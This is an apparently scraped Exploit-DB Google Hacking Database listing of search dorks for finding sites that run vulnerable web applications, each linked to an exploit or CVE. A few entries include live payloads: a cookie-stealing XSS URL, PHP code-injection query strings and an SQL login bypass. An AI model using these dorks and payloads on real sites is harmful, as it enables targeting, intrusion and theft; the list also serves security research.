<shortDescription>&quot;Powered by Real Estate Portal&quot;</shortDescription>
<textualDescription>NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln - CVE: 2008-5309: https://www.exploit-db.com/exploits/7208</textualDescription>
<query>&quot;Powered by Real Estate Portal&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Real+Estate+Portal%22</querystring>
<edb>https://www.exploit-db.com/exploits/7208</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2901</id>
<link>https://www.exploit-db.com/ghdb/2901</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by real-estate-website&quot;</shortDescription>
<textualDescription>Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/5763</textualDescription>
<query>&quot;powered by real-estate-website&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+real-estate-website%22</querystring>
<edb>https://www.exploit-db.com/exploits/5763</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2590</id>
<link>https://www.exploit-db.com/ghdb/2590</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by RealAdmin and Red Cow Technologies, Inc.&quot;</shortDescription>
<textualDescription>RealAdmin (detail.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11325</textualDescription>
<query>&quot;Powered by RealAdmin and Red Cow Technologies, Inc.&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+RealAdmin+and+Red+Cow+Technologies,+Inc.%22</querystring>
<edb>https://www.exploit-db.com/exploits/11325</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2654</id>
<link>https://www.exploit-db.com/ghdb/2654</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Reciprocal Links Manager&quot;</shortDescription>
<textualDescription>Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability - CVE: 2008-4086: https://www.exploit-db.com/exploits/6349</textualDescription>
<query>&quot;Powered by Reciprocal Links Manager&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Reciprocal+Links+Manager%22</querystring>
<edb>https://www.exploit-db.com/exploits/6349</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2545</id>
<link>https://www.exploit-db.com/ghdb/2545</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by RedCat&quot; inurl:index.php?contentId=</shortDescription>
<textualDescription>redcat media SQL Injection: https://www.exploit-db.com/exploits/10043</textualDescription>
<query>&quot;Powered by RedCat&quot; inurl:index.php?contentId=</query>
<querystring>https://www.google.com/search?q=%22Powered+by+RedCat%22+inurl:index.php%3FcontentId%3D</querystring>
<edb>https://www.exploit-db.com/exploits/10043</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1696</id>
<link>https://www.exploit-db.com/ghdb/1696</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by RGameScript&quot;</shortDescription>
<textualDescription>RGameScript Pro (page.php id) Remote File Inclusion Vulnerability - CVE: 2007-3980: https://www.exploit-db.com/exploits/4210</textualDescription>
<query>&quot;Powered by RGameScript&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+RGameScript%22</querystring>
<edb>https://www.exploit-db.com/exploits/4210</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2696</id>
<link>https://www.exploit-db.com/ghdb/2696</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Rock Band CMS 0.10&quot; </shortDescription>
<textualDescription>BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities - CVE: 2009-3252: https://www.exploit-db.com/exploits/9553</textualDescription>
<query>&quot;Powered by Rock Band CMS 0.10&quot; </query>
<querystring>https://www.google.com/search?q=%22Powered+by+Rock+Band+CMS+0.10%22</querystring>
<edb>https://www.exploit-db.com/exploits/9553</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1301</id>
<link>https://www.exploit-db.com/ghdb/1301</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by runcms&quot; -runcms.com -runcms.org</shortDescription>
<textualDescription>&quot;powered by runcms&quot; -runcms.com -runcms.org all versions</textualDescription>
<query>&quot;powered by runcms&quot; -runcms.com -runcms.org</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22powered+by+runcms%22+-runcms.com+-runcms.org+&amp;btnG=Cerca&amp;lr=</querystring>
<edb></edb>
<date>2006-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>2950</id>
<link>https://www.exploit-db.com/ghdb/2950</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by RW::Download v2.0.3 lite&quot;</shortDescription>
<textualDescription>RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln - CVE: 2007-4845: https://www.exploit-db.com/exploits/4371</textualDescription>
<query>&quot;Powered by RW::Download v2.0.3 lite&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+RW%3A%3ADownload+v2.0.3+lite%22</querystring>
<edb>https://www.exploit-db.com/exploits/4371</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1730</id>
<link>https://www.exploit-db.com/ghdb/1730</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by samart-cms&quot;</shortDescription>
<textualDescription>samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5862</textualDescription>
<query>&quot;Powered by samart-cms&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+samart-cms%22</querystring>
<edb>https://www.exploit-db.com/exploits/5862</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2442</id>
<link>https://www.exploit-db.com/ghdb/2442</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by sazcart&quot;</shortDescription>
<textualDescription>SazCart 1.5 (cart.php) Remote File Include Vulnerability - CVE: 2006-5727: https://www.exploit-db.com/exploits/2718</textualDescription>
<query>&quot;powered by sazcart&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+sazcart%22</querystring>
<edb>https://www.exploit-db.com/exploits/2718</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2749</id>
<link>https://www.exploit-db.com/ghdb/2749</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SazCart&quot;</shortDescription>
<textualDescription>SazCart 1.5.1 (prodid) Remote SQL Injection - CVE: 2008-2411: https://www.exploit-db.com/exploits/5576</textualDescription>
<query>&quot;Powered by SazCart&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+SazCart%22</querystring>
<edb>https://www.exploit-db.com/exploits/5576</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1272</id>
<link>https://www.exploit-db.com/ghdb/1272</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by sblog&quot; +&quot;version 0.7&quot;</shortDescription>
<textualDescription>please go here for a writeup on the vulnerability.HTML injection.http://www.securityfocus.com/bid/17044</textualDescription>
<query>&quot;powered by sblog&quot; +&quot;version 0.7&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+sblog%22+%2B%22version+0.7%22</querystring>
<edb></edb>
<date>2006-03-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>2766</id>
<link>https://www.exploit-db.com/ghdb/2766</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Scallywag&quot;</shortDescription>
<textualDescription>Scallywag (template.php path) Remote File Inclusion Vulnerabilities - CVE: 2007-2900: https://www.exploit-db.com/exploits/3972</textualDescription>
<query>&quot;Powered by Scallywag&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Scallywag%22</querystring>
<edb>https://www.exploit-db.com/exploits/3972</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2772</id>
<link>https://www.exploit-db.com/ghdb/2772</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By ScozNews&quot;</shortDescription>
<textualDescription>ScozNews 1.2.1 (mainpath) Remote File Inclusion Vulnerability - CVE: 2006-2487: https://www.exploit-db.com/exploits/1800</textualDescription>
<query>&quot;Powered By ScozNews&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+ScozNews%22</querystring>
<edb>https://www.exploit-db.com/exploits/1800</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2868</id>
<link>https://www.exploit-db.com/ghdb/2868</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Scratcher&quot;</shortDescription>
<textualDescription>Scratcher (SQL/XSS) Multiple Remote Vulnerability - CVE: 2010-1742: https://www.exploit-db.com/exploits/12458</textualDescription>
<query>&quot;Powered by Scratcher&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Scratcher%22</querystring>
<edb>https://www.exploit-db.com/exploits/12458</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1542</id>
<link>https://www.exploit-db.com/ghdb/1542</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Scripteen Free Image Hosting Script V 2.3&quot;</shortDescription>
<textualDescription>Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln - CVE: 2009-4987: https://www.exploit-db.com/exploits/9256</textualDescription>
<query>&quot;Powered by Scripteen Free Image Hosting Script V 2.3&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Scripteen+Free+Image+Hosting+Script+V+2.3%22</querystring>
<edb>https://www.exploit-db.com/exploits/9256</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3194</id>
<link>https://www.exploit-db.com/ghdb/3194</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Scripteen Free Image Hosting Script V1.2&quot;</shortDescription>
<textualDescription>Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber - CVE: 2008-3211: https://www.exploit-db.com/exploits/6070</textualDescription>
<query>&quot;Powered by Scripteen Free Image Hosting Script V1.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Scripteen+Free+Image+Hosting+Script+V1.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/6070</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3396</id>
<link>https://www.exploit-db.com/ghdb/3396</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Seditio&quot;</shortDescription>
<textualDescription>Seditio CMS 121 Remote SQL Injection - CVE: 2007-6202: https://www.exploit-db.com/exploits/4678</textualDescription>
<query>&quot;Powered by Seditio&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Seditio%22</querystring>
<edb>https://www.exploit-db.com/exploits/4678</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2072</id>
<link>https://www.exploit-db.com/ghdb/2072</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by seditio&quot; OR &quot;powered by ldu&quot;</shortDescription>
<textualDescription>Seditio CMS v121 (pfs.php) Remote File Upload Vulnerability - CVE: 2007-4057: https://www.exploit-db.com/exploits/4235</textualDescription>
<query>&quot;powered by seditio&quot; OR &quot;powered by ldu&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+seditio%22+OR+%22powered+by+ldu%22</querystring>
<edb>https://www.exploit-db.com/exploits/4235</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3579</id>
<link>https://www.exploit-db.com/ghdb/3579</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by sendcard - an advanced PHP e-card program&quot;</shortDescription>
<textualDescription>SendCard 3.4.0 Unauthorized Administrative Access: https://www.exploit-db.com/exploits/2117</textualDescription>
<query>&quot;Powered by sendcard - an advanced PHP e-card program&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+sendcard+-+an+advanced+PHP+e-card+program%22</querystring>
<edb>https://www.exploit-db.com/exploits/2117</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1404</id>
<link>https://www.exploit-db.com/ghdb/1404</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by sendcard - an advanced PHP e-card program&quot; -site:sendcard.org</shortDescription>
<textualDescription>this is for Sendcard remote commands execution,advisory/ poc exploit: http://retrogod.altervista.org/sendcard_340_xpl.html</textualDescription>
<query>&quot;Powered by sendcard - an advanced PHP e-card program&quot; -site:sendcard.org</query>
<querystring>https://www.google.com/search?q=%22Powered+by+sendcard+-+an+advanced+PHP+e-card+program%22+-site:sendcard.org&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1937</id>
<link>https://www.exploit-db.com/ghdb/1937</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by sendcard - an advanced PHP e-card program&quot; -site:sendcard.org</shortDescription>
<textualDescription>Sendcard 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability - CVE: 2007-2471: https://www.exploit-db.com/exploits/3827</textualDescription>
<query>&quot;Powered by sendcard - an advanced PHP e-card program&quot; -site:sendcard.org</query>
<querystring>https://www.google.com/search?q=%22Powered+by+sendcard+-+an+advanced+PHP+e-card+program%22+-site:sendcard.org</querystring>
<edb>https://www.exploit-db.com/exploits/3827</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5879</id>
<link>https://www.exploit-db.com/ghdb/5879</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SePortal 2.5&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered by SePortal 2.5&quot;
# By using this dork, sites &quot;Powered by SePortal 2.5&quot; can be found.
SePortal 2.5 is prone to an Sql Injection Vulnerability. This dork is
linked to the following existing exploit:
https://www.exploit-db.com/exploits/32359
# Date: 1/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by SePortal 2.5&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by SePortal 2.5&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3599</id>
<link>https://www.exploit-db.com/ghdb/3599</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Shadowed Portal&quot;</shortDescription>
<textualDescription>Shadowed Portal 5.7d3 Remote Command Execution Exploit: https://www.exploit-db.com/exploits/4768</textualDescription>
<query>&quot;Powered by Shadowed Portal&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Shadowed+Portal%22</querystring>
<edb>https://www.exploit-db.com/exploits/4768</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3544</id>
<link>https://www.exploit-db.com/ghdb/3544</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Shop-Script FREE&quot;</shortDescription>
<textualDescription>Shop-Script FREE 2.0 Remote Command Execution - CVE: 2007-4932: https://www.exploit-db.com/exploits/4419/</textualDescription>
<query>&quot;Powered by Shop-Script FREE&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by Shop-Script FREE&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/4419</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2438</id>
<link>https://www.exploit-db.com/ghdb/2438</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Shout!&quot;</shortDescription>
<textualDescription>ShoutCMS (content.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11305</textualDescription>
<query>&quot;Powered by Shout!&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Shout!%22</querystring>
<edb>https://www.exploit-db.com/exploits/11305</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3380</id>
<link>https://www.exploit-db.com/ghdb/3380</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by shutter v0.1.1&quot; </shortDescription>
<textualDescription>Shutter 0.1.1 Multiple Remote SQL Injection Vulnerabilities - CVE: 2009-1650: https://www.exploit-db.com/exploits/8679</textualDescription>
<query>&quot;powered by shutter v0.1.1&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+shutter+v0.1.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/8679</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2309</id>
<link>https://www.exploit-db.com/ghdb/2309</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Simple PHP Text newsletter&quot;</shortDescription>
<textualDescription>Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities - CVE: 2009-0340: https://www.exploit-db.com/exploits/7813</textualDescription>
<query>&quot;Powered by Simple PHP Text newsletter&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+Simple+PHP+Text+newsletter%22</querystring>
<edb>https://www.exploit-db.com/exploits/7813</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3649</id>
<link>https://www.exploit-db.com/ghdb/3649</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by simpleview CMS&quot;</shortDescription>
<textualDescription>Author: Sun Army XSS: /search/?searchString=&quot;&gt;alert(document.cookie)&amp;submitSearch.x=17&amp;submitSearch.y=13</textualDescription>
<query>&quot;powered by simpleview CMS&quot;</query>
<querystring>https://www.google.com/search?q=&quot;powered+by+simpleview+CMS&quot;</querystring>
<edb></edb>
<date>2010-12-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1269</id>
<link>https://www.exploit-db.com/ghdb/1269</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Simplog&quot;</shortDescription>
<textualDescription>searches for simplog which has directory traversal and XSS velnerabilites in version</textualDescription>
<query>&quot;Powered by Simplog&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Simplog%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-03-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3618</id>
<link>https://www.exploit-db.com/ghdb/3618</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SiteEngine&quot;</shortDescription>
<textualDescription>SiteEngine 7.1 SQL injection Vulnerability: https://www.exploit-db.com/exploits/15612</textualDescription>
<query>&quot;Powered by SiteEngine&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered%20by%20SiteEngine%22</querystring>
<edb>https://www.exploit-db.com/exploits/15612</edb>
<date>2010-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>2835</id>
<link>https://www.exploit-db.com/ghdb/2835</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Sitellite&quot;</shortDescription>
<textualDescription>Sitellite CMS 4.2.12 (559668.php) Remote File Inclusion Vulnerability - CVE: 2007-3228: https://www.exploit-db.com/exploits/4071</textualDescription>
<query>&quot;powered by Sitellite&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Sitellite%22</querystring>
<edb>https://www.exploit-db.com/exploits/4071</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2192</id>
<link>https://www.exploit-db.com/ghdb/2192</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SiteX 0.7 Beta&quot;</shortDescription>
<textualDescription>SiteX 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities - CVE: 2009-1846: https://www.exploit-db.com/exploits/8816</textualDescription>
<query>&quot;Powered by SiteX 0.7 Beta&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+SiteX+0.7+Beta%22</querystring>
<edb>https://www.exploit-db.com/exploits/8816</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3740</id>
<link>https://www.exploit-db.com/ghdb/3740</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SLAED CMS&quot;</shortDescription>
<textualDescription>Exploit Title: Slaed CMS Code exec
On different versions of this software next vulnerabilities are availible:
/index.php?name=Search&amp;mod=&amp;word={${phpinfo()}}&amp;query=ok&amp;to=view
/index.php?name=Search&amp;mod=&amp;word=ok&amp;query={${phpinfo()}}&amp;to=view
OR:
/search.html?mod=&amp;word={${phpinfo()}}&amp;query=ok&amp;to=view
/search.html?mod=&amp;word=ok&amp;query={${phpinfo()}}&amp;to=view</textualDescription>
<query>&quot;Powered by SLAED CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+SLAED+CMS%22</querystring>
<edb></edb>
<date>2011-09-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3482</id>
<link>https://www.exploit-db.com/ghdb/3482</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SMF&quot;</shortDescription>
<textualDescription>Simple Machines Forum 1.1 rc2 local inclusion: https://www.exploit-db.com/exploits/2231</textualDescription>
<query>&quot;Powered by SMF&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+SMF%22</querystring>
<edb>https://www.exploit-db.com/exploits/2231</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1467</id>
<link>https://www.exploit-db.com/ghdb/1467</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Smoothflash&quot;</shortDescription>
<textualDescription>Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability - CVE: 2008-1623: https://www.exploit-db.com/exploits/5322</textualDescription>
<query>&quot;Powered by Smoothflash&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Smoothflash%22</querystring>
<edb>https://www.exploit-db.com/exploits/5322</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1901</id>
<link>https://www.exploit-db.com/ghdb/1901</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by sNews &quot; inurl:index.php?id=</shortDescription>
<textualDescription>sNews (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14458</textualDescription>
<query>&quot;Powered by sNews &quot; inurl:index.php?id=</query>
<querystring>https://www.google.com/search?q=%22Powered+by+sNews+%22+inurl:index.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/14458</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5870</id>
<link>https://www.exploit-db.com/ghdb/5870</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by sNews CMS&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered by sNews CMS&quot;
# By using this dork, sites &quot;Powered by sNews CMS&quot; can be found. The
vulnerability exists due to failure in the &quot;snews.php&quot; script to properly
sanitize user-supplied input in &quot;website_title&quot; variable. Successful
exploitation of this vulnerability could result in a compromise of the
application, theft of cookie-based authentication credentials, disclosure
or modification of sensitive data.
This dork is linked to the following existing exploit:
https://www.exploit-db.com/exploits/15295
# Date: 31/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by sNews CMS&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by sNews CMS&quot;</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1763</id>
<link>https://www.exploit-db.com/ghdb/1763</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by sNews&quot;</shortDescription>
<textualDescription>sNews v1.7 (index.php?category) SQL Injection Vulnerability - CVE: 2010-2926: https://www.exploit-db.com/exploits/14465</textualDescription>
<query>&quot;Powered by sNews&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+sNews%22</querystring>
<edb>https://www.exploit-db.com/exploits/14465</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2255</id>
<link>https://www.exploit-db.com/ghdb/2255</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Sniggabo CMS&quot; inurl:article.php?id</shortDescription>
<textualDescription>Sniggabo CMS (article.php id) Remote SQL Injection: https://www.exploit-db.com/exploits/8933</textualDescription>
<query>&quot;powered by Sniggabo CMS&quot; inurl:article.php?id</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22powered+by+Sniggabo+CMS%22+inurl:article.php%3Fid</querystring>
<edb>https://www.exploit-db.com/exploits/8933</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1825</id>
<link>https://www.exploit-db.com/ghdb/1825</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by SnoGrafx&quot;</shortDescription>
<textualDescription>SnoGrafx (cat.php?cat) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14523</textualDescription>
<query>&quot;powered by SnoGrafx&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+SnoGrafx%22</querystring>
<edb>https://www.exploit-db.com/exploits/14523</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2158</id>
<link>https://www.exploit-db.com/ghdb/2158</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006&quot;</shortDescription>
<textualDescription>SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability - CVE: 2007-5627: https://www.exploit-db.com/exploits/4554</textualDescription>
<query>&quot;Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+SocketMail+Lite+version+2.2.8.+Copyright+%C3%82%C2%A9+2002-2006%22</querystring>
<edb>https://www.exploit-db.com/exploits/4554</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2102</id>
<link>https://www.exploit-db.com/ghdb/2102</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SoftbizScripts&quot; &quot;ALL JOBS&quot;</shortDescription>
<textualDescription>Softbiz Jobs &amp; Recruitment Remote SQL Injection Vulnerability - CVE: 2007-5316: https://www.exploit-db.com/exploits/4504</textualDescription>
<query>&quot;Powered by SoftbizScripts&quot; &quot;ALL JOBS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+SoftbizScripts%22+%22ALL+JOBS%22</querystring>
<edb>https://www.exploit-db.com/exploits/4504</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2059</id>
<link>https://www.exploit-db.com/ghdb/2059</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SoftbizScripts&quot; &quot;OUR SPONSORS&quot;</shortDescription>
<textualDescription>Softbiz Link Directory Script Remote SQL Injection Vulnerability - CVE: 2007-5996: https://www.exploit-db.com/exploits/4620</textualDescription>
<query>&quot;Powered by SoftbizScripts&quot; &quot;OUR SPONSORS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+SoftbizScripts%22+%22OUR+SPONSORS%22</querystring>
<edb>https://www.exploit-db.com/exploits/4620</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1797</id>
<link>https://www.exploit-db.com/ghdb/1797</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SoftbizScripts&quot; inurl:&quot;searchresult.php?sbcat_id=&quot;</shortDescription>
<textualDescription>Softbiz Recipes Portal Script Remote SQL Injection Vulnerability - CVE: 2007-5449: https://www.exploit-db.com/exploits/4527</textualDescription>
<query>&quot;Powered by SoftbizScripts&quot; inurl:&quot;searchresult.php?sbcat_id=&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+SoftbizScripts%22+inurl:%22searchresult.php%3Fsbcat_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/4527</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1625</id>
<link>https://www.exploit-db.com/ghdb/1625</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SoftbizScripts&quot; inurl:store_info.php</shortDescription>
<textualDescription>Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability - CVE: 2007-5122: https://www.exploit-db.com/exploits/4457</textualDescription>
<query>&quot;Powered by SoftbizScripts&quot; inurl:store_info.php</query>
<querystring>https://www.google.com/search?q=%22Powered+by+SoftbizScripts%22+inurl:store_info.php</querystring>
<edb>https://www.exploit-db.com/exploits/4457</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3693</id>
<link>https://www.exploit-db.com/ghdb/3693</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SOFTMAN&quot;</shortDescription>
<textualDescription>Author: eXeSoul
[i] &quot;Powered by SOFTMAN&quot;
[ii] &quot;Powered by Softman Multitech Pvt Ltd&quot;
[iii] &quot;All Rights reserved by SOFTMAN&quot;
Go To Admin Panel :-
Admin: ' or 'x'='x Password: ' or 'x'='x</textualDescription>
<query>&quot;Powered by SOFTMAN&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by SOFTMAN&quot;</querystring>
<edb></edb>
<date>2011-03-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3636</id>
<link>https://www.exploit-db.com/ghdb/3636</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by SOOP Portal Raven 1.0b&quot;</shortDescription>
<textualDescription>Submitter: Sun Army - https://www.exploit-db.com/exploits/15703</textualDescription>
